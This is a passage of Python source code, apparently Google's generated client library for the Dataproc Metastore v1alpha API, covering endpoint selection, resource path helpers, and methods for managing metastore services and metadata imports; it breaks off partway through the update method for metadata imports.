from typing import Callable, Dict, Optional, Sequence, Tuple, Type, Union
import pkg_resources
from google.api_core import client_options as client_options_lib # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError # type: ignore
from google.oauth2 import service_account # type: ignore
from google.api_core import operation # type: ignore
from google.api_core import operation_async # type: ignore
from google.cloud.metastore_v1alpha.services.dataproc_metastore import pagers
from google.cloud.metastore_v1alpha.types import metastore
from google.protobuf import empty_pb2 # type: ignore
from google.protobuf import field_mask_pb2 # type: ignore
from google.protobuf import timestamp_pb2 # type: ignore
from .transports.base import DataprocMetastoreTransport, DEFAULT_CLIENT_INFO
from .transports.grpc import DataprocMetastoreGrpcTransport
from .transports.grpc_asyncio import DataprocMetastoreGrpcAsyncIOTransport
class DataprocMetastoreClientMeta(type):
"""Metaclass for the DataprocMetastore client.
This provides class-level methods for building and retrieving
support objects (e.g. transport) without polluting the client instance
objects.
"""
_transport_registry = (
OrderedDict()
) # type: Dict[str, Type[DataprocMetastoreTransport]]
_transport_registry["grpc"] = DataprocMetastoreGrpcTransport
_transport_registry["grpc_asyncio"] = DataprocMetastoreGrpcAsyncIOTransport
def get_transport_class(
cls, label: str = None,
) -> Type[DataprocMetastoreTransport]:
"""Returns an appropriate transport class.
Args:
label: The name of the desired transport. If none is
provided, then the first transport in the registry is used.
Returns:
The transport class to use.
"""
# If a specific transport is requested, return that one.
if label:
return cls._transport_registry[label]
# No transport is requested; return the default (that is, the first one
# in the dictionary).
return next(iter(cls._transport_registry.values()))
class DataprocMetastoreClient(metaclass=DataprocMetastoreClientMeta):
"""Configures and manages metastore services. Metastore services are
fully managed, highly available, auto-scaled, auto-healing,
OSS-native deployments of technical metadata management software.
Each metastore service exposes a network endpoint through which
metadata queries are served. Metadata queries can originate from a
variety of sources, including Apache Hive, Apache Presto, and Apache
Spark.
The Dataproc Metastore API defines the following resource model:
- The service works with a collection of Google Cloud projects,
named: ``/projects/*``
- Each project has a collection of available locations, named:
``/locations/*`` (a location must refer to a Google Cloud
``region``)
- Each location has a collection of services, named:
``/services/*``
- Dataproc Metastore services are resources with names of the form:
``/projects/{project_number}/locations/{location_id}/services/{service_id}``.
"""
@staticmethod
def _get_default_mtls_endpoint(api_endpoint):
"""Converts api endpoint to mTLS endpoint.
Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
"*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.
Args:
api_endpoint (Optional[str]): the api endpoint to convert.
Returns:
str: converted mTLS api endpoint.
"""
if not api_endpoint:
return api_endpoint
mtls_endpoint_re = re.compile(
r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
)
m = mtls_endpoint_re.match(api_endpoint)
name, mtls, sandbox, googledomain = m.groups()
if mtls or not googledomain:
return api_endpoint
if sandbox:
return api_endpoint.replace(
"sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
)
return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
DEFAULT_ENDPOINT = "metastore.googleapis.com"
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
DataprocMetastoreClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(info)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
DataprocMetastoreClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@property
def transport(self) -> DataprocMetastoreTransport:
"""Returns the transport used by the client instance.
Returns:
DataprocMetastoreTransport: The transport used by the client
instance.
"""
return self._transport
@staticmethod
def backup_path(project: str, location: str, service: str, backup: str,) -> str:
"""Returns a fully-qualified backup string."""
return "projects/{project}/locations/{location}/services/{service}/backups/{backup}".format(
project=project, location=location, service=service, backup=backup,
)
@staticmethod
def parse_backup_path(path: str) -> Dict[str, str]:
"""Parses a backup path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/services/(?P<service>.+?)/backups/(?P<backup>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def metadata_import_path(
project: str, location: str, service: str, metadata_import: str,
) -> str:
"""Returns a fully-qualified metadata_import string."""
return "projects/{project}/locations/{location}/services/{service}/metadataImports/{metadata_import}".format(
project=project,
location=location,
service=service,
metadata_import=metadata_import,
)
@staticmethod
def parse_metadata_import_path(path: str) -> Dict[str, str]:
"""Parses a metadata_import path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/services/(?P<service>.+?)/metadataImports/(?P<metadata_import>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def network_path(project: str, network: str,) -> str:
"""Returns a fully-qualified network string."""
return "projects/{project}/global/networks/{network}".format(
project=project, network=network,
)
@staticmethod
def parse_network_path(path: str) -> Dict[str, str]:
"""Parses a network path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/global/networks/(?P<network>.+?)$", path
)
return m.groupdict() if m else {}
@staticmethod
def service_path(project: str, location: str, service: str,) -> str:
"""Returns a fully-qualified service string."""
return "projects/{project}/locations/{location}/services/{service}".format(
project=project, location=location, service=service,
)
@staticmethod
def parse_service_path(path: str) -> Dict[str, str]:
"""Parses a service path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/services/(?P<service>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def common_billing_account_path(billing_account: str,) -> str:
"""Returns a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str, str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(folder: str,) -> str:
"""Returns a fully-qualified folder string."""
return "folders/{folder}".format(folder=folder,)
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str, str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(organization: str,) -> str:
"""Returns a fully-qualified organization string."""
return "organizations/{organization}".format(organization=organization,)
@staticmethod
def parse_common_organization_path(path: str) -> Dict[str, str]:
"""Parse a organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(project: str,) -> str:
"""Returns a fully-qualified project string."""
return "projects/{project}".format(project=project,)
@staticmethod
def parse_common_project_path(path: str) -> Dict[str, str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(project: str, location: str,) -> str:
"""Returns a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(
project=project, location=location,
)
@staticmethod
def parse_common_location_path(path: str) -> Dict[str, str]:
"""Parse a location path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path)
return m.groupdict() if m else {}
def __init__(
self,
*,
credentials: Optional[ga_credentials.Credentials] = None,
transport: Union[str, DataprocMetastoreTransport, None] = None,
client_options: Optional[client_options_lib.ClientOptions] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiates the dataproc metastore client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, DataprocMetastoreTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. It won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
if isinstance(client_options, dict):
client_options = client_options_lib.from_dict(client_options)
if client_options is None:
client_options = client_options_lib.ClientOptions()
# Create SSL credentials for mutual TLS if needed.
use_client_cert = bool(
util.strtobool(os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false"))
)
client_cert_source_func = None
is_mtls = False
if use_client_cert:
if client_options.client_cert_source:
is_mtls = True
client_cert_source_func = client_options.client_cert_source
else:
is_mtls = mtls.has_default_client_cert_source()
if is_mtls:
client_cert_source_func = mtls.default_client_cert_source()
else:
client_cert_source_func = None
# Figure out which api endpoint to use.
if client_options.api_endpoint is not None:
api_endpoint = client_options.api_endpoint
else:
use_mtls_env = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto")
if use_mtls_env == "never":
api_endpoint = self.DEFAULT_ENDPOINT
elif use_mtls_env == "always":
api_endpoint = self.DEFAULT_MTLS_ENDPOINT
elif use_mtls_env == "auto":
if is_mtls:
api_endpoint = self.DEFAULT_MTLS_ENDPOINT
else:
api_endpoint = self.DEFAULT_ENDPOINT
else:
raise MutualTLSChannelError(
"Unsupported GOOGLE_API_USE_MTLS_ENDPOINT value. Accepted "
"values: never, auto, always"
)
# Save or instantiate the transport.
# Ordinarily, we provide the transport, but allowing a custom transport
# instance provides an extensibility point for unusual situations.
if isinstance(transport, DataprocMetastoreTransport):
# transport is a DataprocMetastoreTransport instance.
if credentials or client_options.credentials_file:
raise ValueError(
"When providing a transport instance, "
"provide its credentials directly."
)
if client_options.scopes:
raise ValueError(
"When providing a transport instance, provide its scopes "
"directly."
)
self._transport = transport
else:
Transport = type(self).get_transport_class(transport)
self._transport = Transport(
credentials=credentials,
credentials_file=client_options.credentials_file,
host=api_endpoint,
scopes=client_options.scopes,
client_cert_source_for_mtls=client_cert_source_func,
quota_project_id=client_options.quota_project_id,
client_info=client_info,
)
def list_services(
self,
request: metastore.ListServicesRequest = None,
*,
parent: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListServicesPager:
r"""Lists services in a project and location.
Args:
request (google.cloud.metastore_v1alpha.types.ListServicesRequest):
The request object. Request message for
[DataprocMetastore.ListServices][google.cloud.metastore.v1alpha.DataprocMetastore.ListServices].
parent (str):
Required. The relative resource name of the location of
metastore services to list, in the following form:
``projects/{project_number}/locations/{location_id}``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.metastore_v1alpha.services.dataproc_metastore.pagers.ListServicesPager:
Response message for
[DataprocMetastore.ListServices][google.cloud.metastore.v1alpha.DataprocMetastore.ListServices].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a metastore.ListServicesRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, metastore.ListServicesRequest):
request = metastore.ListServicesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.list_services]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListServicesPager(
method=rpc, request=request, response=response, metadata=metadata,
)
# Done; return the response.
return response
def get_service(
self,
request: metastore.GetServiceRequest = None,
*,
name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> metastore.Service:
r"""Gets the details of a single service.
Args:
request (google.cloud.metastore_v1alpha.types.GetServiceRequest):
The request object. Request message for
[DataprocMetastore.GetService][google.cloud.metastore.v1alpha.DataprocMetastore.GetService].
name (str):
Required. The relative resource name of the metastore
service to retrieve, in the following form:
``projects/{project_number}/locations/{location_id}/services/{service_id}``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.metastore_v1alpha.types.Service:
A managed metastore service that
serves metadata queries.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a metastore.GetServiceRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, metastore.GetServiceRequest):
request = metastore.GetServiceRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get_service]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def create_service(
self,
request: metastore.CreateServiceRequest = None,
*,
parent: str = None,
service: metastore.Service = None,
service_id: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Creates a metastore service in a project and
location.
Args:
request (google.cloud.metastore_v1alpha.types.CreateServiceRequest):
The request object. Request message for
[DataprocMetastore.CreateService][google.cloud.metastore.v1alpha.DataprocMetastore.CreateService].
parent (str):
Required. The relative resource name of the location in
which to create a metastore service, in the following
form:
``projects/{project_number}/locations/{location_id}``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
service (google.cloud.metastore_v1alpha.types.Service):
Required. The Metastore service to create. The ``name``
field is ignored. The ID of the created metastore
service must be provided in the request's ``service_id``
field.
This corresponds to the ``service`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
service_id (str):
Required. The ID of the metastore
service, which is used as the final
component of the metastore service's
name.
This value must be between 2 and 63
characters long inclusive, begin with a
letter, end with a letter or number, and
consist of alpha-numeric ASCII
characters or hyphens.
This corresponds to the ``service_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be
:class:`google.cloud.metastore_v1alpha.types.Service` A
managed metastore service that serves metadata queries.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, service, service_id])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a metastore.CreateServiceRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, metastore.CreateServiceRequest):
request = metastore.CreateServiceRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if service is not None:
request.service = service
if service_id is not None:
request.service_id = service_id
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.create_service]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
metastore.Service,
metadata_type=metastore.OperationMetadata,
)
# Done; return the response.
return response
def update_service(
self,
request: metastore.UpdateServiceRequest = None,
*,
service: metastore.Service = None,
update_mask: field_mask_pb2.FieldMask = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Updates the parameters of a single service.
Args:
request (google.cloud.metastore_v1alpha.types.UpdateServiceRequest):
The request object. Request message for
[DataprocMetastore.UpdateService][google.cloud.metastore.v1alpha.DataprocMetastore.UpdateService].
service (google.cloud.metastore_v1alpha.types.Service):
Required. The metastore service to update. The server
only merges fields in the service if they are specified
in ``update_mask``.
The metastore service's ``name`` field is used to
identify the metastore service to be updated.
This corresponds to the ``service`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (google.protobuf.field_mask_pb2.FieldMask):
Required. A field mask used to specify the fields to be
overwritten in the metastore service resource by the
update. Fields specified in the ``update_mask`` are
relative to the resource (not to the full request). A
field is overwritten if it is in the mask.
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be
:class:`google.cloud.metastore_v1alpha.types.Service` A
managed metastore service that serves metadata queries.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([service, update_mask])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a metastore.UpdateServiceRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, metastore.UpdateServiceRequest):
request = metastore.UpdateServiceRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if service is not None:
request.service = service
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.update_service]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("service.name", request.service.name),)
),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
metastore.Service,
metadata_type=metastore.OperationMetadata,
)
# Done; return the response.
return response
def delete_service(
self,
request: metastore.DeleteServiceRequest = None,
*,
name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Deletes a single service.
Args:
request (google.cloud.metastore_v1alpha.types.DeleteServiceRequest):
The request object. Request message for
[DataprocMetastore.DeleteService][google.cloud.metastore.v1alpha.DataprocMetastore.DeleteService].
name (str):
Required. The relative resource name of the metastore
service to delete, in the following form:
``projects/{project_number}/locations/{location_id}/services/{service_id}``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.protobuf.empty_pb2.Empty` A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to
use it as the request or the response type of an API
method. For instance:
service Foo {
rpc Bar(google.protobuf.Empty) returns
(google.protobuf.Empty);
}
The JSON representation for Empty is empty JSON
object {}.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a metastore.DeleteServiceRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, metastore.DeleteServiceRequest):
request = metastore.DeleteServiceRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.delete_service]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
empty_pb2.Empty,
metadata_type=metastore.OperationMetadata,
)
# Done; return the response.
return response
def list_metadata_imports(
self,
request: metastore.ListMetadataImportsRequest = None,
*,
parent: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListMetadataImportsPager:
r"""Lists imports in a service.
Args:
request (google.cloud.metastore_v1alpha.types.ListMetadataImportsRequest):
The request object. Request message for
[DataprocMetastore.ListMetadataImports][google.cloud.metastore.v1alpha.DataprocMetastore.ListMetadataImports].
parent (str):
Required. The relative resource name of the service
whose metadata imports to list, in the following form:
``projects/{project_number}/locations/{location_id}/services/{service_id}/metadataImports``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.metastore_v1alpha.services.dataproc_metastore.pagers.ListMetadataImportsPager:
Response message for
[DataprocMetastore.ListMetadataImports][google.cloud.metastore.v1alpha.DataprocMetastore.ListMetadataImports].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a metastore.ListMetadataImportsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, metastore.ListMetadataImportsRequest):
request = metastore.ListMetadataImportsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.list_metadata_imports]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListMetadataImportsPager(
method=rpc, request=request, response=response, metadata=metadata,
)
# Done; return the response.
return response
def get_metadata_import(
self,
request: metastore.GetMetadataImportRequest = None,
*,
name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> metastore.MetadataImport:
r"""Gets details of a single import.
Args:
request (google.cloud.metastore_v1alpha.types.GetMetadataImportRequest):
The request object. Request message for
[DataprocMetastore.GetMetadataImport][google.cloud.metastore.v1alpha.DataprocMetastore.GetMetadataImport].
name (str):
Required. The relative resource name of the metadata
import to retrieve, in the following form:
``projects/{project_number}/locations/{location_id}/services/{service_id}/metadataImports/{import_id}``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.metastore_v1alpha.types.MetadataImport:
A metastore resource that imports
metadata.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a metastore.GetMetadataImportRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, metastore.GetMetadataImportRequest):
request = metastore.GetMetadataImportRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get_metadata_import]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def create_metadata_import(
self,
request: metastore.CreateMetadataImportRequest = None,
*,
parent: str = None,
metadata_import: metastore.MetadataImport = None,
metadata_import_id: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Creates a new MetadataImport in a given project and
location.
Args:
request (google.cloud.metastore_v1alpha.types.CreateMetadataImportRequest):
The request object. Request message for
[DataprocMetastore.CreateMetadataImport][google.cloud.metastore.v1alpha.DataprocMetastore.CreateMetadataImport].
parent (str):
Required. The relative resource name of the service in
which to create a metastore import, in the following
form:
``projects/{project_number}/locations/{location_id}/services/{service_id}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
metadata_import (google.cloud.metastore_v1alpha.types.MetadataImport):
Required. The metadata import to create. The ``name``
field is ignored. The ID of the created metadata import
must be provided in the request's ``metadata_import_id``
field.
This corresponds to the ``metadata_import`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
metadata_import_id (str):
Required. The ID of the metadata
import, which is used as the final
component of the metadata import's name.
This value must be between 1 and 64
characters long, begin with a letter,
end with a letter or number, and consist
of alpha-numeric ASCII characters or
hyphens.
This corresponds to the ``metadata_import_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be
:class:`google.cloud.metastore_v1alpha.types.MetadataImport`
A metastore resource that imports metadata.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, metadata_import, metadata_import_id])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a metastore.CreateMetadataImportRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, metastore.CreateMetadataImportRequest):
request = metastore.CreateMetadataImportRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if metadata_import is not None:
request.metadata_import = metadata_import
if metadata_import_id is not None:
request.metadata_import_id = metadata_import_id
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.create_metadata_import]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
metastore.MetadataImport,
metadata_type=metastore.OperationMetadata,
)
# Done; return the response.
return response
def update_metadata_import(
self,
request: metastore.UpdateMetadataImportRequest = None,
*,
